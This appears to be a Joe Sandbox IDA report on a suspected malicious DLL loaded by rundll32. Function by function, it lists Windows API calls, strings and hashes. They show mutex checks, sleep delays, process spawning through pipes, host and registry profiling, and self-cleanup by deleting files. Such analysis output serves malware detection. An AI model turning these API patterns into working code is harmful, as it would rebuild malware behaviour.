Part of subcall function 00007FFE1A5168A0: DeleteFileW.KERNEL32 ref: 00007FFE1A51699A

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$Temp$DeleteHandleName$AddressCloseCountHeapLibraryLoadModuleMutexOpenPathProcProcessSleepTick
String ID:
API String ID: 3639944527-0
Opcode ID: 8d719ceab6d8d7e53d0274f050039b4cfc6d783270bfcb1f42072c3fd141ad19
Instruction ID: 554eeff3cb1ca30c8535d37bde3291993904b66e357c0f9d6aa8c98dc5411ae5
Opcode Fuzzy Hash: 8d719ceab6d8d7e53d0274f050039b4cfc6d783270bfcb1f42072c3fd141ad19
Instruction Fuzzy Hash: 84518D71B0CE4286EA10DB62E8142B977A2FB46BA4F4441F7DA5E07BA6DF3CE445C700

Function 00007FFE1A514C96 Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A5122D0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5122F9
Part of subcall function 00007FFE1A5122D0: GetProcAddress.KERNEL32 ref: 00007FFE1A51231F
Part of subcall function 00007FFE1A5122D0: GetProcAddress.KERNEL32 ref: 00007FFE1A512345
Part of subcall function 00007FFE1A5122D0: GetProcAddress.KERNEL32 ref: 00007FFE1A51236B
Part of subcall function 00007FFE1A5122D0: GetModuleFileNameW.KERNEL32 ref: 00007FFE1A512396
Part of subcall function 00007FFE1A5122D0: DeleteFileW.KERNEL32 ref: 00007FFE1A5123D6

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$FileHandleModule$CloseCountDeleteHeapLibraryLoadMutexNameOpenProcessSleepTick
String ID:
API String ID: 2411591737-0
Opcode ID: aaccbc2ed6a62b374cf1b3482786e29b781fb4819d4d040a4fe17441c6d66a16
Instruction ID: 65e72076bd77d6e5d7b516daa6b53ac4a121c74a8a12eb468708dcb55bbe030b
Opcode Fuzzy Hash: aaccbc2ed6a62b374cf1b3482786e29b781fb4819d4d040a4fe17441c6d66a16
Instruction Fuzzy Hash: 71417E71B0CA4286EB10DB22E8442B977A6FB46BA4F5451F6DA5E437A6DF3CE045CB00

Function 00007FFE1A511900 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFE1A511374), ref: 00007FFE1A51191C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFE1A511374), ref: 00007FFE1A511942
GlobalMemoryStatusEx.KERNEL32 ref: 00007FFE1A511960

Strings

@, xrefs: 00007FFE1A511958

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: @
API String ID: 2450578220-2766056989
Opcode ID: 0afb79ebcdfbdeb580ecc7f8eacd47776bfb190c1650612288748f96ddd47335
Instruction ID: 63f78c4a04c9070f08728a45ec949b62440133c696fc19e79f54b490c3ec3e15
Opcode Fuzzy Hash: 0afb79ebcdfbdeb580ecc7f8eacd47776bfb190c1650612288748f96ddd47335
Instruction Fuzzy Hash: 8AF04F11B1CA4692EE10DB66F4140796392AB89FE4F8800F6DA8E47766DE2CD041CA10

Function 00007FFE1A5121E0 Relevance: 6.1, APIs: 4, Instructions: 61
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A51220A
CreateMutexExW.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A512217
GetLastError.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A512229
CloseHandle.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A5122A8

Part of subcall function 00007FFE1A517BB0: LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517BDF
Part of subcall function 00007FFE1A517BB0: GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C16
Part of subcall function 00007FFE1A517BB0: LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C46
Part of subcall function 00007FFE1A517BB0: GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C7D
Part of subcall function 00007FFE1A517BB0: GetCommandLineW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C92
Part of subcall function 00007FFE1A517BB0: CommandLineToArgvW.SHELL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517CA0
Part of subcall function 00007FFE1A517BB0: LocalFree.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517D0E

Part of subcall function 00007FFE1A515670: CreateMutexW.KERNEL32 ref: 00007FFE1A5156A5
Part of subcall function 00007FFE1A515670: Sleep.KERNEL32 ref: 00007FFE1A5156B8
Part of subcall function 00007FFE1A515670: CloseHandle.KERNEL32 ref: 00007FFE1A5156C1
Part of subcall function 00007FFE1A515670: Sleep.KERNEL32 ref: 00007FFE1A51570F
Part of subcall function 00007FFE1A515670: GetTickCount.KERNEL32 ref: 00007FFE1A515715
Part of subcall function 00007FFE1A515670: rand.LIBCMT ref: 00007FFE1A515722

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressCloseCommandCreateErrorHandleLastLibraryLineLoadMutexProcSleep$ArgvCountFreeLocalTickrand
String ID:
API String ID: 1739745066-0
Opcode ID: 007474db8946118fe8e355bdae2cebbab7dfe6101b2419ff64d7ce1083001067
Instruction ID: 2bad742780335e2f9ed0bde02e135f6ad5ddaa4890bcc880368a0e3e645cc9fd
Opcode Fuzzy Hash: 007474db8946118fe8e355bdae2cebbab7dfe6101b2419ff64d7ce1083001067
Instruction Fuzzy Hash: 48212760F1CE4381FA54AB63691117E6293AF57FF4F4440F7ED5E86AA6EE2CE4018250

Function 00007FFE1A5115B0 Relevance: 3.0, APIs: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A5115DB
GetProcAddress.KERNEL32 ref: 00007FFE1A511615

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 504d3d5ea27a1ec0ca3ae44b2ac06d5499e97c70d6572123b3758e013bd21691
Instruction ID: 0b1a02e1c3674cf7095295a72767b1fb6d9a3c0fe7502492e1b8803ac71778fe
Opcode Fuzzy Hash: 504d3d5ea27a1ec0ca3ae44b2ac06d5499e97c70d6572123b3758e013bd21691
Instruction Fuzzy Hash: 7E119521F1DF4290EA509B52A85537923A2BF96BA4F8401F7D94E476B1EF2CE505C610

Function 00007FFE1A511AD0 Relevance: 3.0, APIs: 2, Instructions: 18threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFE1A511AF4
CloseHandle.KERNEL32(?,?,?,?,?,?,00007FFE1A518B86), ref: 00007FFE1A511B02

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID:
API String ID: 3032276028-0
Opcode ID: 8cfc052431e2fe914d99a1079fcf1934225668cbea66fe8ac47fcc2c739b686d
Instruction ID: 76fd12b5448042ccf2aee6879835bff2bef3a867ce86e14336f18fa189e23537
Opcode Fuzzy Hash: 8cfc052431e2fe914d99a1079fcf1934225668cbea66fe8ac47fcc2c739b686d
Instruction Fuzzy Hash: 6BE04F21F0DF8192EB14CB62A8402B53772FB86B69F9041FBD94E02770EE3CD204C600

Function 00007FFE1A511300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A5115B0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5115DB
Part of subcall function 00007FFE1A5115B0: GetProcAddress.KERNEL32 ref: 00007FFE1A511615

SHGetFolderPathW.SHELL32 ref: 00007FFE1A51132C

Part of subcall function 00007FFE1A5113A0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5113D7
Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A51140E
Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A511445
Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A51147C
Part of subcall function 00007FFE1A5113A0: sprintf_s.LIBCMTD ref: 00007FFE1A5114B3
Part of subcall function 00007FFE1A5113A0: FindFirstFileW.KERNEL32 ref: 00007FFE1A5114CD

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad$FileFindFirstFolderPathsprintf_s
String ID:
API String ID: 2295756454-0
Opcode ID: a93a366b1067c516a2c5388df4c4fc0c196fb9a44ef68532cc3e3670074d5784
Instruction ID: 60b44061a4883b79c66b4d1d548233400c97e60c6ea8589a223ff7c8f37ad727
Opcode Fuzzy Hash: a93a366b1067c516a2c5388df4c4fc0c196fb9a44ef68532cc3e3670074d5784
Instruction Fuzzy Hash: 62011621F1CF4291FA247672B4897BC3166BF57BA4F5414FBE24E81AFB9D2CE1804512

Function 00007FFE1A511C10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00007FFE1A511C25

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 354914485c76ce71eee5e368870040763071e6f1620a4b606cf0e1d3c0a82ec0
Instruction ID: 878a60dfb9c499cfe5c676fcfcef8d77968ffa5a8221bf4a6b1eb47a8eac656a
Opcode Fuzzy Hash: 354914485c76ce71eee5e368870040763071e6f1620a4b606cf0e1d3c0a82ec0
Instruction Fuzzy Hash: 49D09225E0DB4AC7E6941706A89877432A2AB96B29F9040FAC10A012F14E3C24D5CA00

Non-executed Functions

Function 00007FFE1A513F30 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 311pipesleepprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 00007FFE1A513F90
SetHandleInformation.KERNEL32 ref: 00007FFE1A513FB2

Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A5125DB
Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A512614

sprintf_s.LIBCMTD ref: 00007FFE1A51406B
GetCurrentDirectoryW.KERNEL32 ref: 00007FFE1A514084
CreateProcessW.KERNEL32 ref: 00007FFE1A5140C9
WaitForSingleObject.KERNEL32 ref: 00007FFE1A5140E1
GetModuleHandleW.KERNEL32 ref: 00007FFE1A5140FB
PeekNamedPipe.KERNEL32 ref: 00007FFE1A51411D
GetModuleHandleW.KERNEL32 ref: 00007FFE1A51413E
Sleep.KERNEL32 ref: 00007FFE1A51414E
PeekNamedPipe.KERNEL32 ref: 00007FFE1A514172
GetCurrentDirectoryW.KERNEL32 ref: 00007FFE1A514198
ReadFile.KERNEL32 ref: 00007FFE1A5142A0
TerminateProcess.KERNEL32 ref: 00007FFE1A5143CB
CloseHandle.KERNEL32 ref: 00007FFE1A5143D6
CloseHandle.KERNEL32 ref: 00007FFE1A5143E1
CloseHandle.KERNEL32 ref: 00007FFE1A514418
CloseHandle.KERNEL32 ref: 00007FFE1A514423

Strings

2, xrefs: 00007FFE1A514144

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Handle$Close$Pipe$ByteCharCreateCurrentDirectoryModuleMultiNamedPeekProcessWide$FileInformationObjectReadSingleSleepTerminateWaitsprintf_s
String ID: 2
API String ID: 1694488271-450215437
Opcode ID: 61d8321d1346369c2d04f836b7ec7d76cda028776995c865a42c467b8aec4cfc
Instruction ID: 8c914c178dea5517f3ef1cfe50378ccda432f1b42be8a85285450510ce6e2199
Opcode Fuzzy Hash: 61d8321d1346369c2d04f836b7ec7d76cda028776995c865a42c467b8aec4cfc
Instruction Fuzzy Hash: E5E1617270DB8286EB10CF66A4502B97BA2FB86FA8F4441B6DA4D47BA5DF3CD144C740

Function 00007FFE1A5168A0 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 258filelibraryprocessCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A5168E5
GetProcAddress.KERNEL32 ref: 00007FFE1A51690B
GetTempPathW.KERNEL32 ref: 00007FFE1A516928
GetTempFileNameW.KERNEL32 ref: 00007FFE1A516946
DeleteFileW.KERNEL32 ref: 00007FFE1A516953
GetTempFileNameW.KERNEL32 ref: 00007FFE1A516990
DeleteFileW.KERNEL32 ref: 00007FFE1A51699A
GetSystemDirectoryW.KERNEL32 ref: 00007FFE1A516ABB
sprintf_s.LIBCMTD ref: 00007FFE1A516AF8
CreateProcessW.KERNEL32 ref: 00007FFE1A516CA0
CloseHandle.KERNEL32 ref: 00007FFE1A516CAF
CloseHandle.KERNEL32 ref: 00007FFE1A516CBA
DeleteFileW.KERNEL32 ref: 00007FFE1A516CCB

Strings

dat, xrefs: 00007FFE1A516935, 00007FFE1A51697F
h, xrefs: 00007FFE1A516BCA
%ls\%ls "%ls",, xrefs: 00007FFE1A516AD4

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$DeleteTemp$CloseHandleName$AddressCreateDirectoryLibraryLoadPathProcProcessSystemsprintf_s
String ID: %ls\%ls "%ls",$dat$h
API String ID: 2143415541-650927715
Opcode ID: 67e320bd700a9eddc28fe40f1a4a6760eb798dc9e6c7093fe6d0b7cac3e57d15
Instruction ID: f740a0b811928c14da9800b1030afd83aac0f6e5b635bf143c40c9fcbcb3fa55
Opcode Fuzzy Hash: 67e320bd700a9eddc28fe40f1a4a6760eb798dc9e6c7093fe6d0b7cac3e57d15
Instruction Fuzzy Hash: C6C19E22718A8295DB10DF66D8512F973B2FB85FA8F8441B3DA0E43AA4DF3CD14AC750

Function 00007FFE1A512C40 Relevance: 22.7, APIs: 15, Instructions: 238registrynetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE1A512C84
gethostname.WS2_32 ref: 00007FFE1A512C95
gethostbyname.WS2_32 ref: 00007FFE1A512CA4
GetModuleHandleW.KERNEL32 ref: 00007FFE1A512CBF
inet_ntoa.WS2_32 ref: 00007FFE1A512CC7
RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A512D1B
RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A512D69
RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A512D9F
RegQueryValueExW.ADVAPI32 ref: 00007FFE1A512DD2
RegCloseKey.ADVAPI32 ref: 00007FFE1A512DE1
RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A512E18
RegCloseKey.ADVAPI32 ref: 00007FFE1A512E3E
GlobalMemoryStatusEx.KERNEL32 ref: 00007FFE1A512E57
WideCharToMultiByte.KERNEL32 ref: 00007FFE1A512E8E
WideCharToMultiByte.KERNEL32 ref: 00007FFE1A512ED4

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: ByteCharCloseEnumMultiOpenWide$GlobalHandleMemoryModuleQueryStartupStatusValuegethostbynamegethostnameinet_ntoa
String ID:
API String ID: 2767472909-0
Opcode ID: 0e7fbe9883d529331d68332c0a376186802381b6b0324fe57bb981fb92d1069f
Instruction ID: 23ee12216ccc6b73aa93453eaa92559ab5f1e145b346df2076951eca3b5d002e
Opcode Fuzzy Hash: 0e7fbe9883d529331d68332c0a376186802381b6b0324fe57bb981fb92d1069f
Instruction Fuzzy Hash: F4B1747270CB8186E7208F26E8406BDB7A5FB85BA4F4441B6DA8E47BA4DF3CD545CB40

Function 00007FFE1A517740 Relevance: 22.6, APIs: 15, Instructions: 101memorycomCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 00007FFE1A517759
CoCreateInstance.OLE32 ref: 00007FFE1A517791
VariantInit.OLEAUT32 ref: 00007FFE1A5177A4
VariantInit.OLEAUT32 ref: 00007FFE1A5177AF
VariantInit.OLEAUT32 ref: 00007FFE1A5177BA
VariantInit.OLEAUT32 ref: 00007FFE1A5177C5
SysAllocString.OLEAUT32 ref: 00007FFE1A51784C
SysAllocString.OLEAUT32 ref: 00007FFE1A51786E
SysFreeString.OLEAUT32 ref: 00007FFE1A51788E
SysFreeString.OLEAUT32 ref: 00007FFE1A517897
VariantClear.OLEAUT32 ref: 00007FFE1A5178AA
VariantClear.OLEAUT32 ref: 00007FFE1A5178B5
VariantClear.OLEAUT32 ref: 00007FFE1A5178C0
VariantClear.OLEAUT32 ref: 00007FFE1A5178CB
CoUninitialize.OLE32 ref: 00007FFE1A5178DB

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitialize
String ID:
API String ID: 2615526013-0
Opcode ID: a3ed77044e1bac965df96e1fa07373414ce81337b406c852ab00482a6af9236a
Instruction ID: 6e4f8e7ab8ea13b5b89f09f01d4e32e2714c4d3388053e0704e11687f7d5423d
Opcode Fuzzy Hash: a3ed77044e1bac965df96e1fa07373414ce81337b406c852ab00482a6af9236a
Instruction Fuzzy Hash: 86516E22B18E96D6E711CF76E8041BD6371FB95BA8F405162EE4E53624DF3CD189C700

Function 00007FFE1A515E70 Relevance: 21.3, APIs: 14, Instructions: 270libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A515EA2
GetProcAddress.KERNEL32 ref: 00007FFE1A515ED9
LoadLibraryW.KERNEL32 ref: 00007FFE1A515F09
GetProcAddress.KERNEL32 ref: 00007FFE1A515F40
LoadLibraryW.KERNEL32 ref: 00007FFE1A515F70
GetProcAddress.KERNEL32 ref: 00007FFE1A515FA7
GetProcAddress.KERNEL32 ref: 00007FFE1A515FDE
GetProcAddress.KERNEL32 ref: 00007FFE1A516015
GetProcAddress.KERNEL32 ref: 00007FFE1A51604C
GetProcAddress.KERNEL32 ref: 00007FFE1A516083
GetProcAddress.KERNEL32 ref: 00007FFE1A5160BA
GetProcAddress.KERNEL32 ref: 00007FFE1A5160F1
LoadLibraryW.KERNEL32 ref: 00007FFE1A516121
GetProcAddress.KERNEL32 ref: 00007FFE1A516158

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 0bfe53c474903e58965b61b7a659ccba2d14d3dd14d9afd4becd7c1e21fa82b1
Instruction ID: 9ef3095e95ffb6e179e98f6602645407b6288fea3aa4a8078ad5b7ec71993e8d
Opcode Fuzzy Hash: 0bfe53c474903e58965b61b7a659ccba2d14d3dd14d9afd4becd7c1e21fa82b1
Instruction Fuzzy Hash: 1AD1D424B0DF4395EA50EB63A86457963A6AF86FB8F4400F7D90E47BB5EE3CE444C250

Function 00007FFE1A515160 Relevance: 18.3, APIs: 12, Instructions: 307fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32 ref: 00007FFE1A515336
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FFE1A515350
GetFileAttributesW.KERNEL32 ref: 00007FFE1A515457
DeleteFileW.KERNEL32 ref: 00007FFE1A515467
GetFileAttributesW.KERNEL32 ref: 00007FFE1A515474
DeleteFileW.KERNEL32 ref: 00007FFE1A515486
GetFileAttributesW.KERNEL32 ref: 00007FFE1A515598
DeleteFileW.KERNEL32 ref: 00007FFE1A5155A8
GetFileAttributesW.KERNEL32 ref: 00007FFE1A5155B5
DeleteFileW.KERNEL32 ref: 00007FFE1A5155C7
RemoveDirectoryW.KERNEL32 ref: 00007FFE1A5155D4
RemoveDirectoryW.KERNEL32 ref: 00007FFE1A5155E1

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

